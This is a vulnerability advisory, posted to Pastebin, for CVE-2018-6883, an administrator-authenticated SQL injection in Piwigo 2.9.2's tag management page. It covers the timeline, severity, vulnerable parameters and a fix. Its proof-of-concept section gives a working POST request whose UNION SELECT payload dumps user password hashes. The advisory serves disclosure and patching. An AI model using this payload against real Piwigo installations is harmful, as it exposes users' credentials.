Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Document Title:
- ===============
- Piwigo v2.9.2 - SQL injection in administration panel
- CVE-ID:
- =======
- CVE-2018-6883
- Release Date:
- =============
- 2018-02-11
- References:
- =============
- https://github.com/Piwigo/Piwigo/issues/839
- Common Vulnerability Scoring System:
- ====================================
- 3.8 (AV:N/AC:H/Au:S/C:C/I:N/A:N/E:F/RL:TF/RC:UC/CDP:N/TD:ND/CR:ND/IR:ND/AR:ND)
- Vulnerability Class:
- ====================
- SQL injection
- Product & Service Introduction:
- ===============================
- Piwigo is photo gallery software for the web, built by an active community of users and developers. Freely available extensions can be used to customize Piwigo. It is written in PHP using MySQL as a database server.
- Abstract Advisory Information:
- ==============================
- An SQL injection has been discovered in the administration panel of Piwigo (version 2.9.2).
- Vulnerability Disclosure Timeline:
- ==================================
- 2018-02-10: Requested CVE ID
- 2018-02-11: Informed vendor
- 2018-02-21: Acknowledged by vendor
- 2018-02-22: Patch created by vendor
- Discovery Status:
- =================
- Fixed
- Affected Product(s):
- ====================
- Piwigo
- Product: Piwigo - Content Management System (Web-Application) 2.9.2
- Exploitation Technique:
- =======================
- Remote
- Severity Level:
- ===============
- Low
- Authentication Type:
- ====================
- Requires admin privileges
- User Interaction:
- =================
- Low User Interaction
- Disclosure Type:
- ================
- Independent Security Research
- Technical Details & Description:
- ================================
- An SQL injection has been discovered in the administration panel of Piwigo v2.9.2. The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query. This could result in full information disclosure.
- The SQL injection vulnerability was found in admin/tags.php and is done by injecting SQL code in the 'tags' POST variable. This variable is only sanitized by addslashes() and is not encapsulated by quotes in the concatenated SQL string allowing the injection to work. Furthermore, the result set is part of the page output allowing information disclosure about other tables in the database.
- The POST variables 'edit_list' and 'merge_list' are also vulnerable to this attack, however, no exploit exist to disclose information through these variables. A separate vulnerability report was made for 'edit_list' (CVE-2017-16893).
- The security risk of the vulnerability is estimated as low with a CVSS score of 3.8. Exploitation of the web vulnerability requires the attacker to be authenticated as administrator.
- Request Method(s):
- [+] POST
- Vulnerable File(s):
- [+] admin/tags.php
- Vulnerable Parameter(s):
- [+] edit_list
- [+] merge_list
- [+] tags
- Affected Module(s):
- [+] Backend
- Proof of Concept (PoC):
- =======================
- Once the attacker obtains a session of an administrator, the attacker can then send a POST request with a specially crafted to /admin.php?page=tags as follows:
- POST http://localhost/piwigo/admin.php?page=tags HTTP/1.0
- Content-Type: application/x-www-form-urlencoded
- Cookie: <ADMIN COOKIE>
- pwg_token=<TOKEN>&tags%5B%5D=-1)%20UNION%20(SELECT%20password%20FROM%20piwigo_users&selectAction=delete&confirm_deletion=1&delete=
- The result page will have the password hashes of all users at this line:
- "The following 4 keywords have been deleted : XXXX, XXXX, XXXX, XXXX"
- Solution - Fix & Patch:
- =======================
- Introduce further sanitization of the $_POST['edit_list'], $_POST['merge_list'], and $_POST['tags'] variable by limiting the input to an array of integers only.
- Security Risk:
- ==============
- The security risk of this SQL injection that requires admin privileges is estimated to be low (CVSS score 3.8)
- Credits & Authors:
- ==================
- Jorrit Kronjee <jorrit at wafel dot org>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement